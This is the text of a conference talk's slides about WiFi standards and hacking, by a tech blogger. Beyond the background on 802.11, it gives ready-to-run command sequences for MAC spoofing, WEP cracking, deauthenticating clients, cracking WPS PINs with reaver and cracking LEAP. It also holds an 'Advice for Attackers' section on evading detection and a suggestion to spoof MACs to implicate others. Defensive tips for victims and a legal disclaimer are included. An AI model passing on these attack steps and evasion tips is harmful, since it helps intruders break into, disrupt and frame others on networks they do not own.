The Myth of WiFi Security

by James Kegel

http://GeekBlog.TV

Twitter - @GeekBlogTV

Meet and Greet

James Kegel

​

• WiFi Hobbyist
• Linux Enthusiast
• Tech Blogger

​

and now...

​

...Public Speaker!

In The Beginning..

• First home computer.
• Windows 3.1, DOS, Wolf3D, 486 w/ 'turbo' button.
• First hack, 1 year later. "California Raisins"
• My name is James, and I am a cheater.
• 1996: Packet Zero Sent @ 14.4k
• "MOM WHY DID YOU PICK UP THE PHONE?!"
• Discovered HTML Chat Scrollers; Coolchat
• Read "The Cathedral and the Bazaar"
• A paper written by Eric S. Raymond
• First taste of Linux; Redhat 4.2
• Bought it at Sam's Club
• Gnome was much better back then, youngsters will just have to trust me on this.
• Mom was pissed; I was hooked.. [fdisk /mbr]

​

​

Fast Forward a Bit..

• I use Debian 6 these days, but still hooked.
• Mom's a bit more appreciative.
• Still collecting and devouring every txt-phile in sight; PHRACK, 2600, O'Reilly
• Still devoted to free software; sharing.
• The information wants to be free.
• Still on the quest to score a Gibson
• no more raisins; switched to pineapples
• now with 100% more ethics (Thanks, Mr. Donato)
• Educating the public and myself, one tutorial at a time.
• GeekBlogTV

​

​

Now, you go.

Take a look at your neighbors; Do you see any of the following in the crowd

Do you fit one of these descriptions?

​

• Law enforcement?
• Merry prankster?
• Lost pedestrian?

Foolish Assumptions

Since you are here, I am making a few assumptions..

​

YOU ARE...

​

• Curious about WiFi
• Not afraid of using the terminal
• A rule breaker... For science!

​

Before we start...

• These activities are fun, and educational, but outside of your own closed WiFi lab, some of them can be illegal or disruptive to nearby networks.
• Although this presentation is meant to educate you, this information can be abused and I encourage you not to do that.
• Any demos or example code are for "Proof of Concept" only, and should be used with consideration for your neighbors on the airwaves.

​

WiFi: A Brief History

Simplified Timeline

• 1985 - FCC releases ISM (industrial, scientific & medical) band for unlicensed use.
• 1991 - NCR Corp & ATT invent precursor to 802.11 for cash registers to use.
• "Wavelan" 902-928 MHz - 1-2 mbits
• 1992 - CSIRO (aus) secures patents, embarks on 20-year litigation binge, makes over $200+ Million, and more for years to come.

​

Simplified Timeline

• 1997 - 802.11-1997 or "802.11-Legacy" was first debuted
• 1999 - Wireless Ethernet Compatibility Alliance formed.
• 2002 - WECA changed to WiFi Alliance
• 1999 - the term "Wi-Fi" is coined by brand consultants Interbrand, who felt it was "a little catchier than IEEE 802.11b Direct Sequence."

​

Simplified Timeline

• 2012 - Your refrigerator now has 802.11 functionality. People don't even bat an eyelash at wireless signals emanating from all types of everyday objects like:
• television
• cell phones
• picture frames
• vehicles
• public transportation
• local retail

​

​

​

​

​

​

​

802.11(x)-#

The lettered protocols

802.11a-1999

• 54mbits/sec
• 5GHz
• Orthoganal Frequency Division Multiplexing
• Helped w/ poor channel conditions
• ADSL, WiMax, Digital TV
• Small waves can't penetrate as well

​

802.11b-1999

• Gained worldwide adoption in 1999
• 11mbits/sec and slower
• Max TCP ~6mbits/sec
• Max UDP ~7mbits/sec
• 2.4GHz
• Uses CSMA/CA like Wavelan
• Waits for a turn to speak

​

802.11g-2003

• 2.4GHz
• 54mbits/sec
• Orthoganal Frequency Division Multiplexing
• Immensely popular even before being ratified
• Backwards compatible with 802.11b-1999
• 'b' traffic drops entire network to 11mbit/sec

​

802.11n-2009

• MIMO - Mult. Input, Mult. Output
• up to 4 channels and 4 antennae
• can use 20 & 40MHz wide channels in 2.4/5GHz bands
• 600mbits/sec theoretical max
• Backwards compatible with earlier 802.11x standards
• after 11 drafts, we got 'n' approved in 2009
• Longer range, similar to 'a'

802.11ac---

• MIMO - Mult. Input, Mult. Output
• up to 8 spatial streams
• can use 80 & 160 MHz wide channels in 2.4/5GHz bands
• 6.93gbits/sec theoretical max
• Not official yet

WiFi Channels

802.11 Channels

• Think of WiFi channels like TV channels
• 2.4GHz Spectrum
• Channel width - 22MHz
• 5MHz whitespace between (ch14-12MHz)
• Most commonly used are 1, 6, 11, 14*
• No overlap
• 14 only for JP
• Susceptible to interference
• Microwaves
• Baby monitors

​

The 6 Modes of WiFi

The 6 Modes of WiFi

• Monitor Mode
• Master Mode
• Managed Mode
• Ad-Hoc Mode
• Mesh Mode
• Repeater Mode

Monitor Mode

This is juicy... More on this later

​

To enable:

# airmon-ng start wlan0

Master Mode

• Access Point
• Base Station
• Router
• ..Rogue Hardware?

Managed Mode

• "Infrastructure Mode"
• Client Devices
• Laptop/Desktop
• Phones
• Game Systems

Ad-Hoc Mode

• "Peer-to-Peer"
• No need for AP or Base-station
• Party gets bigger, convo gets slower
• Must have same ESSID
• May not be supported by your interface

# iw phy phy0 info | grep -A8 modes (check mode support)

​

Mesh Mode

• "Planned ad-hoc network"
• Also called "Mesh Cloud"
• Nodes must have 1 common connection
• One node goes down, signal re-routes

Repeater Mode

Exactly what it sounds like

Nothing to see here for us.

Media Access Control

MAC Addresses

• Unique Identifiers for your NIC
• Looks like "00:CA:FE:BA:BE:00"
• Contains Ogranizationally Unique Identifier
• First 3 octets are unique to manufacturer
• linksys "00:04:5A"
• netgear "00:09:5B"
• Potentially a nail-in-the-coffin for prosecution against you as a blackhat.
• Can get you geo-located
• MAC Stored in hardware
• Or is it?....

MAC Addresses Are Fun To Abuse

• Geolocate any network device, anywhere*
• MAC-Spoofing to gain access
• Disposable Fingerprint
• Impersonate/Implicate the other guy

SHOW ME YOUR BITS!

• View your MAC:
• # ifconfig | grep HWaddr
• # macchanger -s wlan0
• Change your MAC:
• # ifconfig wlan0 down
• # ifconfig wlan0 hw ether 00:11:22:33:44:55
• # ifconfig wlan0 up

OR

• # ifconfig wlan0 down
• # macchanger -r wlan0
• # ifconfig wlan0 up

WiFi Frames

the stuff dreams are made of..

WiFi Frames at a Glance

• Similar to ethernet frames
• Header
• Payload
• CRC / Integrity Check
• Contains Useful Data
• Source/Destination MAC
• Control Fields
• SSID

​

Types of WiFi Frames

• Management Frames
• Control Frames
• Data Frames

Management Frames

• Beacons
• "Hey guys, this is my SSID!"
• Probes
• Requests
• "Hey Linksys! I'm looking for you!"
• Response
• AP Says "Here is how to chat with me"
• Associations
• Requests
• "Can you spare some memory?"
• Responses
• "Nah, I'm fresh out.."
• Disassociating
• "Goodbye, have a nice day, then!"

​

Management Frames cont.

• Authentication
• Auth Frame
• Open Network
• "Hey can we chat"
• "Yeah sure"
• WEP Network
• "Can I get in?"
• "What's the password?"
• "New England Clam Chowdah"
• *Door Opens*
• DeAuth Frame
• Still associated, no longer speaking
• Impolite Goodbye

Control Frames

• Request to Send "RTS"
• "Can I send some Data Frames?"
• Clear to Send "CTS"
• "Yeah but you have 5 seconds"
• Acknowledge "ACK"
• If pass CRC
• "Hey buddy I got your package"
• If fail CRC
• "Can you say that again?"

Data Frames

• Contains anything.
• Videos
• Music
• Content
• 'Lost' Season 5

​

I thought this talk was about hacking WiFi?!

I am a carpenter, and these are my tools:

• Assorted WiFi Adapters
• Realtek 8187L RP-SMA
• AWUS036H
• X-Series G
• Realtek 8187B Dongle
• Belkin 54G F5D7050
• RP-SMA Antennae
• Yagi-Uda Array
• 12dbi
• 16dbi
• Omni
• 5dbi
• 9dbi

I am a carpenter, and these are my tools:

• Rogue Hardware
• Pineapple MK II
• Zipit Z2 "Noisy Cricket"
• Evo4G Droid
• Linux
• Debian
• Backtrack
• Ubuntu
• Software
• Wigle WiFi (Android)
• MDK3 (Linux)
• AirDrop-NG / LORCon (Linux)
• Aircrack-NG Suite (Linux)
• Pyrit / Cowpatty / GenPMK (Linux)

WiFi Encryption

and Exploitation

WEP - Wired Equivalent Privacy

• The most feeble WiFi encryption method.
• Susceptible to statistical attacks from Aireplay-NG
• The fastest WEP attacks don't need clients

​

Popular WEP Attacks

• ARP-Replay
• Frag Attack
• ChopChop
• -P 0841

Example WEP Attacks

It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.

Monitor Mode

# airmon-ng start wlan0

start monitor mode on interface wlan0

# airodump-ng -c # --bssid BSSID -w filename mon0

monitor chan # and BSSID and logs output to FILENAME with interface mon0

Fake Association

# aireplay-ng -1 0 -e SSID -a BSSID -h SPOOFMAC mon0

use your spoofed MAC to to try and fake-associate with BSSID named SSID

​

Example WEP Attacks cont.

It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.

ARP-Replay

# aireplay-ng -3 -b BSSID -h SPOOFMAC mon0

start ARP-replay attack at BSSID from SPOOFMAC on interface mon0

or

FRAG Attack

# aireplay-ng -5 -b BSSID -h SPOOFMAC mon0

or

ChopChop Attack

# aireplay-ng -4 -b BSSID -h SPOOFMAC mon0

# packetforge-ng -0 -a BSSID -h SPOOFMAC -k 255.255.255.255.255 -l 255.255.255.255 -y replay_dec.xor -w arp-request

# aireplay-ng -2 -r arp-request mon0

Finally, we hit the aircrack-ng to crack the .cap

# aircrack-ng -b BSSID filename*.cap

​

​

​

WPA1 & WPA2 Attacks, Tkip, CCMP

• Not as feeble as WEP
• It is all about the handshake
• Does not need close proximity for most of the work
• Time-memory Tradeoff

​

Popular WPA1/WPA2 Attacks

• Tkiptun-NG
• Rainbow Tables
• Brute Force (hear me out...)

How does a WPA 1/2 Attack Work?

• DeAuthentication packets force a client to reconnect
• MDK3
• Airdrop-NG
• Aireplay-NG
• Yank the power. No, seriously, cut the power.
• A 4-Way Handshake is recorded on-reconnect
• Handshake is brute forced off-location
• Aircrack-ng
• Pyrit/Cuda/OCLHashcat/CowPatty
• CloudCracker
• Explain RainbowTables and TMTO and ATT Passwords.

​

And last bit of advice...

The password is almost always 10-Digit-Numeric; If it is a 2WIRE# or ATT#, the PW is usually the resident's home phone number. Thanks, ATT tech-support!!

DeAuthentication Expanded

• My favorite ways to clear the air..
• MDK3
• mdk3 mon0 x 1 -c CLIENTMAC -t TARGETMAC
• DeAuth one MAC Address
• mdk3 mon0 d -b BLACKLIST
• DeAuth MACs listed on BLACKLIST
• mdk3 mon0 d -w WHITELIST
• Members only, sorry.
• Airdrop-NG
• a/00-11-22-33-44-55|any # Allow me to connect to any
• d/any|apple # Apple computers dont get internet today
• d/any|any # Everyone out of the pool NOW
• Aireplay-NG
• aireplay-ng -0 1 -a APMAC -c TARGMAC mon0
• Yank the power. No, seriously, cut the power.
• Works every time. Don't cut yours too.

Tkip w/ Tkiptun-NG

• AP and Client MUST support QoS
• AP must be configured for WPA plus TKIP
• You MUST impersonate target MAC via MAC spoof
• You MUST set a long keyring interval (3600s)
• AES and high-traffic can thwart this method.

Usage

• Packet capture ARP request/response
• Source and dest address aren't protected by WEP and Tkip, requests are always sent to broadcast address. Everything but the last byte of the source and dest IP, 8byte MIC (msg. integ. check) and 4byte ICV checksum. MIC and ICV for the last 12bytes of plaintext
• Launch ChopChop to decrypt the unknown remaining bytes
• if ChopChop doesnt guess the last bytes correctly, a MIC Failure Report Frame is generated, but does not increment the TSC (Sequence Counter)
• Wait 60 seconds, try again.
• Total time spent should be about 15 minutes

WiFi Protected Setup

• The little password-button thingy.
• Easiest way, by far, to break WPA1&2
• Reaver exploits the numerical code behind that button you push when you are trying to connect to your WiFi, but can't remember the password.
• Literally, the hardest thing about this is crack is opening your beer and staying awake to watch the fireworks.
• For Linksys, turning off WPS does not prevent this attack; DD-WRT however, doesn't support WPS.

​

USAGE

# airmon-ng start wlan0

# reaver -i mon0 -b TARGMAC -vv

Cisco LEAP Enterprise

• Use Kismet to generate a .dump after capturing a LEAP Exchange (Cloned AP or otherwise)
• Determine if it is a usable dump
• # asleap -r kismet*.dump
• if fail - "Using the passive attack method. Closing pcap..."
• if success "Using the passive attack method. Captured LEAP exchange information"
• If usable, pull out your dictionary
• # asleap -r kismet*.dump -w dict.txt
• If this fails, go get JOHN
• Paste the username, response and challenge into a blank document like this: username:::response::challenge save the file
• # john --format=NETLM file.txt
• Grab a snickers, this could take a while. Enjoy the README in the meantime http://gkbg.tv/QXa2zO

Meet The Attacker

Meet The Attacker

• WiFi Thief
• This is the most benign of attackers. This guy just wants to watch his movies and download obscene amounts of... files....
• HotSpot Pervert
• This guy will use ARP cache poisoning and the Dsniff suite to catch all of those pictures you keep sending your BF. Every Phisherman needs bait..
• Identity Thief
• Ever felt the need to buy a stranger everything he ever wanted and tank your credit in the same day? You are nothing but a number to this guy, and he will drain you dry without so much as a wince.
• Corporate
• Watch how you talk to your 'subordinates'. This should go without saying.
• Curious
• Probably a kid with his first copy of BackTrack and a Pringles Antenna. Nothing to see here.
• Vandal
• Danger, Will Robinson. This one hangs you out to dry simply "For the lulz."

Cover Your Butt

(attacker & victim)

Advice for Victims

• Don't use your ESSID to challenge a suspected hacker.
• Use an IPSEC VPN tunnel for extra protection.
• Always use HTTPS when possible.
• Lower your router TX power to the absolute minimum.
• Use a password with all random characters and symbols. LEETSPEAK IS NOT RANDOM. Keep it long as you can remember, use every character if poss.
• Always use 2-factor-authentication for every account that has it available. One vulnerable account can lead to ALL being compromised.
• Never use the same password anywhere. (use algorithmic PW scheme if you cannot remember)
• NEVER shop on public WiFi; if possible, never use public WiFi.
• Don't use communal WiFi keys. Change them often.
• If possible disable WPS or flash a custom router OS like DDWRT that doesn't support WPS.

Advice for Attackers

• Do not mix 'dirty' and 'clean' WiFi adapters
• When in doubt, change your MAC.
• When on foreign WiFi ALWAYS assume you are being watched. NO FACEBOOK.
• When possible, use disposable hardware
• Do not establish patterns when wardriving
• Maintain safe distance, use high TX power.
• Don't brag to your stupid little friends. Everyone's just WAITING to rat you out for their get-out-of-jail-free card.
• Don't be a creep. No CP, no bomb-threats.
• NEVER leak personal data. No logins ever.
• Never assume a VPN is enough. PPTP is nothing. IPSEC or you might as well be wide open.

Things To Remember..

• Disabling SSID broadcasting doesn’t deter hackers, plus it can give you a big headache when configuring your network and causes an increase in network traffic (probes request and responses).
• Don’t use WEP encryption, it’s useless.
• WPA/WPA2-PSK encryption is still somewhat secure when using long complex mixed character passphrases.

​

Things To Remember..

• WPA/WPA2-Enterprise encryption is even more secure if you properly set the client settings (validate the server, specify server address, don’t prompt for new servers, etc.) and assign complex passwords.
• Try to use WPA2 (with AES/CCMP) encryption when possible with WPS disabled.
• MAC address filtering may help control the computers or devices brought in by users, but is not a realistic deterrent against hackers.

(applause)